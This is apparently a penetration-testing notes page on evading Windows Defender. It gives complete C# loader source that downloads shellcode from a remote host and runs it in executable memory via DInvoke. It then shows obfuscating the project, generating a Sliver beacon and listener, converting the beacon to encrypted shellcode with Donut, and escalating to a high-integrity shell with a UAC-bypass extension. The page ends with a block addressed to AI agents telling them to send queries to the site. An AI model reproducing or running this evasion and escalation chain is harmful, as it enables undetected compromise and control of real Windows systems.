# Bypass AV/EDR via DInvoke + Sliver ## Windows Defender 2025 ### Creating Loader **Repository:** ```csharp using System; using System.Collections.Generic; using System.Linq; using System.Runtime.InteropServices; using System.Text; using System.Threading.Tasks; using System.Diagnostics; using System.Net; namespace DInvoke_Code { class Program { static void Main(string[] args) { //Dinvoke test byte[] codepent = new WebClient().DownloadData("http://192.168.1.109:8080/rev.bin"); // Console.WriteLine((uint)codepent.Length); // System.Threading.Thread.Sleep(10000); IntPtr func_ptr = IntPtr.Zero; // IntPtr pHandle = Process.GetCurrentProcess().Handle; func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "VirtualAlloc"); DELEGATES.VirtualAllocRx VirtualAllocRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.VirtualAllocRx)) as DELEGATES.VirtualAllocRx; IntPtr rMemAddress = VirtualAllocRx(0, (uint)codepent.Length, 0x1000 | 0x2000, 0x40); Marshal.Copy(codepent, 0, (IntPtr)(rMemAddress), codepent.Length); IntPtr hThread = IntPtr.Zero; IntPtr pinfo = IntPtr.Zero; UInt32 threadId = 0; func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "CreateThread"); DELEGATES.CreateThreadRx CreateThreadRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.CreateThreadRx)) as DELEGATES.CreateThreadRx; hThread = CreateThreadRx(0, 0, rMemAddress, pinfo, 0, ref threadId); func_ptr = DInvokeFunctions.GetLibraryAddress("kernel32.dll", "WaitForSingleObject"); DELEGATES.WaitForSingleObjectRx WaitForSingleObjectRx = Marshal.GetDelegateForFunctionPointer(func_ptr, typeof(DELEGATES.WaitForSingleObjectRx)) as DELEGATES.WaitForSingleObjectRx; WaitForSingleObjectRx(hThread, 0xFFFFFFFF); } } } ``` ### Obfuscation the project **Obfuscation project:** {% embed url="" %} **Modify the lines 147,148 as follows:** ```csharp openAssemblyInfoFile = open(assemblyInfoFile, 'r',encoding='utf-8') openCopyAssemblyInfoFile = open(f"{assemblyInfoFile}_copy", "w",encoding='utf-8') ``` ```powershell PS C:\Users\maldev\Desktop\CompiledTools\InvisibilityCloak > python.exe .\InvisibilityCloak.py -d ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload -n "Zero" -m reverse , . . . ,-. . , | o o | o | o | / | | | ;-. . , . ,-. . |-. . | . |- . . | | ,-. ,-: | , | | | |/ | `-. | | | | | | | | | \ | | | | | |< ' ' ' ' ' `-' ' `-' ' ' ' `-' `-| `-' ' `-' `-` ' ` `-' ==================================================== [*] INFO: String obfuscation method: reverse [*] INFO: Directory of C# project: ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload [*] INFO: New tool name: Zero ==================================================== [*] INFO: Generating new GUID for C# project [*] INFO: New project GUID is f9d3c7e4-82de-4a66-9eba-8b0b3c149768 [*] INFO: Changing C# project GUID in below files: ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_shellcodeload.sln ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DInvoke_shellcodeload.csproj ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\Properties\AssemblyInfo.cs [*] INFO: Removing PDB string in C# project file [*] INFO: Renaming DInvoke_shellcodeload.sln to Zero.sln [*] INFO: Renaming DInvoke_shellcodeload.csproj to Zero.csproj [*] INFO: Renaming directory DInvoke_shellcodeload to Zero [+] SUCCESS: New GUID of f9d3c7e4-82de-4a66-9eba-8b0b3c149768 was generated and replaced in your project [+] SUCCESS: New tool name of Zero was replaced in project [*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvokeFunctions.cs [*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DELEGATES.cs [*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\DInvokeFunctions.cs [*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\Program.cs [*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\obj\x64\Debug\.NETFramework,Version=v4.7.2.AssemblyAttributes.cs [*] INFO: Performing reverse obfuscation on strings in ..\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\obj\x86\Debug\.NETFramework,Version=v4.7.2.AssemblyAttributes.cs [+] SUCCESS: Your new tool Zero now has the invisibility cloak applied. FLARE-VM 04/30/2025 16:31:00 PS C:\Users\maldev\Desktop\CompiledTools\InvisibilityCloak > ```

Ofuscated Code with Reverse Mode

In visual studio change the properties of **Output Type** to **Windows Application**
Finally, Replace every instance of `DInvoke` into the project and compile it as Realese with x64 architecture. ```sh PS C:\Users\maldev\Desktop\CompiledTools\DefenderCheck\DefenderCheck\DefenderCheck\bin\Release > .\DefenderCheck.exe C:\Users\maldev\Desktop\CompiledTools\DInvoke_shellcodeload_CSharp\DInvoke_shellcodeload\DInvoke_test\bin\x64\Release\DInvoke_test.exe [+] No threat found in submitted file! ``` ### Create beacon with sliver ```sh sliver > generate beacon --http 192.168.1.109:1234 --os windows [*] Generating new windows/amd64 beacon implant binary (1m0s) [*] Symbol obfuscation is enabled [*] Build completed in 43s [*] Implant saved to /home/Intrusionz3r0/Documents/Sliver/KOREAN_JUNKER.exe sliver > http --lhost 192.168.1.109 --lport 1234 [*] Starting HTTP :1234 listener ... [*] Successfully started job #2 sliver > ``` ### Install Donut ```sh #Download and compile donut Intrusionz3r0@htb[/htb]$ git clone https://github.com/TheWover/donut Intrusionz3r0@htb[/htb]$ cd donut/ Intrusionz3r0@htb[/htb]$ make -f Makefile Intrusionz3r0@htb[/htb]$ ./donut ./ ``` {% hint style="info" %} Using donut specify -e 3 for encryption and -b 1 to not add Amsi bypass because the used Amsi bypass gets detected. {% endhint %} ```sh ❯ ./donut -i KOREAN_JUNKER.exe -b 1 -e 3 -o rev.bin [ Donut shellcode generator v1 (built Apr 30 2025 19:45:41) [ Copyright (c) 2019-2021 TheWover, Odzhan [ Instance type : Embedded [ Module file : "KOREAN_JUNKER.exe" [ Entropy : Random names + Encryption [ File type : EXE [ Target CPU : x86+amd64 [ AMSI/WDLP/ETW : none [ PE Headers : overwrite [ Shellcode : "rev.bin" [ Exit : Thread ``` Payload Downloaded and executed successfully
#### Install UAC-BOF-Bonanza toolkit into Sliver ```sh ❯ git clone https://github.com/icyguider/UAC-BOF-Bonanza.git ❯ cd UAC-BOF-Bonanza ❯ cp -rp ~/Documents/Tools/UAC-BOF-Bonanza/CmstpElevatedCOM/ ~/.sliver-client/extensions ❯ cd ~/.sliver-client/extensions/CmstpElevatedCOM ❯ make sliver (KOREAN_JUNKER) > extensions load /home/Intrusionz3r0/.sliver-client/extensions/CmstpElevatedCOM sliver (KOREAN_JUNKER) > armory install coff-loader ``` #### Elevate token as high integrity Shell ```sh sliver (KOREAN_JUNKER) > CmstpElevatedCOM "C:\Users\maldev\Downloads\http-local-1234.exe" [*] Successfully executed CmstpElevatedCOM (coff-loader) [*] Got output: Successfully spoofed PEB for explorer.exe Successfully created elevated CMLuaUtil COM object Calling ShellExec method from the elevated CMLuaUtil COM object... ShellExec executed successfully! ```

High Integrity Shell

ddd --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0/windows-penetration-testing/defense-enumeration/bypass-av-edr-via-dinvoke-+-sliver.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.